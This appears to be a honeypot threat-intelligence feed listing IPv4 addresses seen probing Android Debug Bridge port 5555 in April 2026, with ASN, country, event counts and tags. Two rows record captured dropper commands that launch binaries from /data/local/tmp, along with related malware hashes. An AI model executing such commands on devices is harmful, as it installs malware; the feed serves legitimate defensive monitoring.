IPv4	162.216.150.138	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-18T06:02:39.000Z \| last_seen=2026-04-18T06:13:45.441Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	64.62.197.92	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-18T10:22:03.000Z \| last_seen=2026-04-18T10:32:13.440Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	64.62.197.97	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-18T10:21:06.000Z \| last_seen=2026-04-18T10:22:12.318Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	152.53.81.25	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=214996; asn_org=netcup GmbH; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=21 \| first_seen=2026-04-18T08:51:06.000Z \| last_seen=2026-04-18T16:58:35.418Z \| ports=5555 \| cc=US \| asn=214996 \| org=netcup GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	138.124.90.121	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=AT; asn=210644; asn_org=Aeza Group LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-18T14:34:59.000Z \| last_seen=2026-04-18T14:36:39.349Z \| ports=5555 \| cc=AT \| asn=210644 \| org=Aeza Group LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	83.168.69.86	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=PL; asn=202520; asn_org=SkyPass Solutions Sp. z.o.o.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=47 \| first_seen=2026-04-18T14:44:34.000Z \| last_seen=2026-04-19T08:23:20.685Z \| ports=5555 \| cc=PL \| asn=202520 \| org=SkyPass Solutions Sp. z.o.o.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	172.236.126.175	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-18T15:47:41.000Z \| last_seen=2026-04-18T15:48:41.976Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	116.115.108.181	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-18T18:16:19.000Z \| last_seen=2026-04-18T18:17:27.089Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-18
IPv4	14.152.90.228	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134763; asn_org=CHINANET Guangdong province network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-13T12:13:47.000Z \| last_seen=2026-04-18T23:25:34.184Z \| ports=5555 \| cc=CN \| asn=134763 \| org=CHINANET Guangdong province network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	176.65.139.46	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-18T23:04:24.000Z \| last_seen=2026-04-18T23:05:25.973Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	147.185.132.237	Attacker IP • ADB / seen in ADBHoney; events=21; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-19T02:52:27.000Z \| last_seen=2026-04-19T03:03:58.043Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	14.10.1.32	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=JP; asn=2516; asn_org=KDDI CORPORATION; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-19T03:09:38.000Z \| last_seen=2026-04-19T03:19:50.471Z \| ports=5555 \| cc=JP \| asn=2516 \| org=KDDI CORPORATION	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	104.248.182.234	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-19T04:37:21.000Z \| last_seen=2026-04-19T04:38:29.213Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	31.7.58.138	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CH; asn=51852; asn_org=Private Layer INC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=83 \| first_seen=2026-04-19T04:48:53.000Z \| last_seen=2026-04-21T05:56:56.557Z \| ports=5555 \| cc=CH \| asn=51852 \| org=Private Layer INC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	90.3.136.99	Attacker IP • ADB / seen in ADBHoney; events=31; ports=5555; cc=FR; asn=3215; asn_org=Orange; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=31 \| first_seen=2026-04-19T04:11:33.000Z \| last_seen=2026-04-19T04:21:45.998Z \| ports=5555 \| cc=FR \| asn=3215 \| org=Orange	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	159.89.7.45	Attacker IP • ADB / seen in ADBHoney; events=2; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-19T05:51:16.000Z \| last_seen=2026-04-19T06:01:33.761Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	40.76.99.43	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-19T06:49:39.000Z \| last_seen=2026-04-19T07:01:17.858Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	194.164.107.6	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=50219; asn_org=Valence Technology Co.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=26 \| first_seen=2026-04-19T10:05:31.000Z \| last_seen=2026-04-19T10:51:38.674Z \| ports=5555 \| cc=US \| asn=50219 \| org=Valence Technology Co.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	64.62.197.212	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=28 \| first_seen=2026-04-19T11:06:42.000Z \| last_seen=2026-04-29T06:29:00.116Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	64.62.197.217	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-19T11:05:09.000Z \| last_seen=2026-04-29T06:19:13.844Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	64.62.156.113	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-19T13:27:57.000Z \| last_seen=2026-04-19T13:29:07.370Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	64.227.5.170	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-19T14:13:51.000Z \| last_seen=2026-04-19T14:14:55.450Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	143.42.164.182	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-19T15:46:54.000Z \| last_seen=2026-04-19T15:48:04.121Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	129.224.215.150	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=AR; asn=14593; asn_org=Space Exploration Technologies Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-19T17:05:53.000Z \| last_seen=2026-04-19T17:15:54.310Z \| ports=5555 \| cc=AR \| asn=14593 \| org=Space Exploration Technologies Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	220.92.152.160	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-19T18:34:28.000Z \| last_seen=2026-04-19T18:44:40.212Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	77.83.240.70	Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=41 \| first_seen=2026-04-19T19:07:55.000Z \| last_seen=2026-04-19T19:32:53.620Z \| ports=5555 \| cc=US \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	195.230.103.243	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=211607; asn_org=Securitytrails, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-19T21:13:02.000Z \| last_seen=2026-04-19T21:14:08.962Z \| ports=5555 \| cc=US \| asn=211607 \| org=Securitytrails, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	158.94.209.193	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=NL; asn=202412; asn_org=Omegatech LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=21 \| first_seen=2026-04-19T22:14:24.000Z \| last_seen=2026-04-20T12:12:47.656Z \| ports=5555 \| cc=NL \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	64.227.189.7	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-19T22:15:06.000Z \| last_seen=2026-04-19T22:39:45.781Z \| ports=5555 \| cc=IN \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	8.209.119.142	Attacker IP • ADB / seen in ADBHoney; events=51; ports=5555; cc=DE; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=51 \| first_seen=2026-04-19T22:18:51.000Z \| last_seen=2026-04-19T22:20:50.150Z \| ports=5555 \| cc=DE \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-19
IPv4	140.122.108.34	Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=TW; asn=1659; asn_org=Taiwan Academic Network TANet Information Center; cats=Generic Protocol Command Decode; adb_cmd_hits=28; cmd="/data/local/tmp/nohup /data/local/tmp/log" Observed in ADBHoney telemetry for 2026-04. events=66 \| first_seen=2026-04-20T00:50:57.000Z \| last_seen=2026-04-20T01:03:15.467Z \| ports=5555 \| cc=TW \| asn=1659 \| org=Taiwan Academic Network TANet Information Center \| related_hashes=608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971,7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865,d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-20
IPv4	66.132.195.157	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-20T00:28:40.000Z \| last_seen=2026-04-20T00:30:21.717Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	64.62.156.224	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-20T08:50:29.000Z \| last_seen=2026-04-20T08:51:32.440Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	24.102.81.83	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=12271; asn_org=Charter Communications Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-20T10:02:36.000Z \| last_seen=2026-04-20T10:12:45.599Z \| ports=5555 \| cc=US \| asn=12271 \| org=Charter Communications Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	143.244.165.110	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-20T12:18:20.000Z \| last_seen=2026-04-20T12:19:29.783Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	223.18.123.232	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=HK; asn=9304; asn_org=HGC Global Communications Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-20T14:55:44.000Z \| last_seen=2026-04-20T14:57:22.054Z \| ports=5555 \| cc=HK \| asn=9304 \| org=HGC Global Communications Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	118.34.189.153	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-20T15:54:48.000Z \| last_seen=2026-04-20T16:04:53.138Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	143.42.1.44	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-20T15:46:36.000Z \| last_seen=2026-04-20T15:47:37.885Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	184.105.247.238	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-20T15:39:21.000Z \| last_seen=2026-04-26T12:31:24.086Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	184.105.247.252	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-20T15:41:37.000Z \| last_seen=2026-04-26T12:42:06.036Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	46.101.166.141	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-20T15:17:19.000Z \| last_seen=2026-04-20T15:27:36.616Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	36.155.147.255	Attacker IP • ADB / seen in ADBHoney; events=61; ports=5555; cc=CN; asn=56046; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=61 \| first_seen=2026-04-20T16:23:05.000Z \| last_seen=2026-04-20T16:36:08.234Z \| ports=5555 \| cc=CN \| asn=56046 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-20
IPv4	20.252.27.216	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-20T17:09:43.000Z \| last_seen=2026-04-20T22:52:39.337Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	75.71.42.229	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-20T18:13:26.000Z \| last_seen=2026-04-20T18:23:35.018Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	39.130.224.66	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-20T19:48:45.000Z \| last_seen=2026-04-20T19:49:48.879Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	45.142.193.176	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-20T19:55:43.000Z \| last_seen=2026-04-20T19:56:49.894Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-20
IPv4	114.98.177.175	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-21T03:52:35.000Z \| last_seen=2026-04-21T04:02:44.794Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	114.98.177.176	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-21T03:52:34.000Z \| last_seen=2026-04-21T03:53:38.379Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	190.164.217.115	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CL; asn=22047; asn_org=VTR BANDA ANCHA S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-21T03:24:03.000Z \| last_seen=2026-04-21T03:25:41.264Z \| ports=5555 \| cc=CL \| asn=22047 \| org=VTR BANDA ANCHA S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	45.142.193.6	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-21T02:10:16.000Z \| last_seen=2026-04-21T05:08:29.213Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	152.32.227.252	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RU; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=101 \| first_seen=2026-04-21T05:57:30.000Z \| last_seen=2026-04-21T06:44:47.122Z \| ports=5555 \| cc=RU \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	65.49.1.144	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-21T11:19:13.000Z \| last_seen=2026-04-21T11:20:20.248Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	102.115.99.178	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=MU; asn=23889; asn_org=MauritiusTelecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-21T12:51:36.000Z \| last_seen=2026-04-21T13:01:48.639Z \| ports=5555 \| cc=MU \| asn=23889 \| org=MauritiusTelecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	65.49.1.202	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-21T12:55:36.000Z \| last_seen=2026-04-21T13:05:47.489Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	65.49.1.204	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-21T12:54:51.000Z \| last_seen=2026-04-21T12:55:59.274Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	45.33.95.64	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-21T15:47:26.000Z \| last_seen=2026-04-21T15:48:31.565Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	130.61.23.157	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=DE; asn=31898; asn_org=Oracle Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-18T09:49:52.000Z \| last_seen=2026-04-21T16:33:06.900Z \| ports=5555 \| cc=DE \| asn=31898 \| org=Oracle Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	204.76.203.225	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=33 \| first_seen=2026-04-21T16:23:35.000Z \| last_seen=2026-04-23T12:39:22.672Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	194.187.178.111	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-21T17:58:33.000Z \| last_seen=2026-04-21T18:08:36.964Z \| ports=5555 \| cc=HK \| asn=215778 \| org=Alpha Strike Labs GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	194.187.178.250	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-21T17:58:31.000Z \| last_seen=2026-04-21T17:59:40.400Z \| ports=5555 \| cc=HK \| asn=215778 \| org=Alpha Strike Labs GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	212.8.252.6	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=49981; asn_org=WorldStream B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-21T17:12:31.000Z \| last_seen=2026-04-21T17:13:41.501Z \| ports=5555 \| cc=NL \| asn=49981 \| org=WorldStream B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	165.245.220.116	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-21T18:11:28.000Z \| last_seen=2026-04-21T18:22:08.085Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
IPv4	204.76.203.224	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=36 \| first_seen=2026-04-21T20:38:12.000Z \| last_seen=2026-04-26T11:23:06.326Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-21
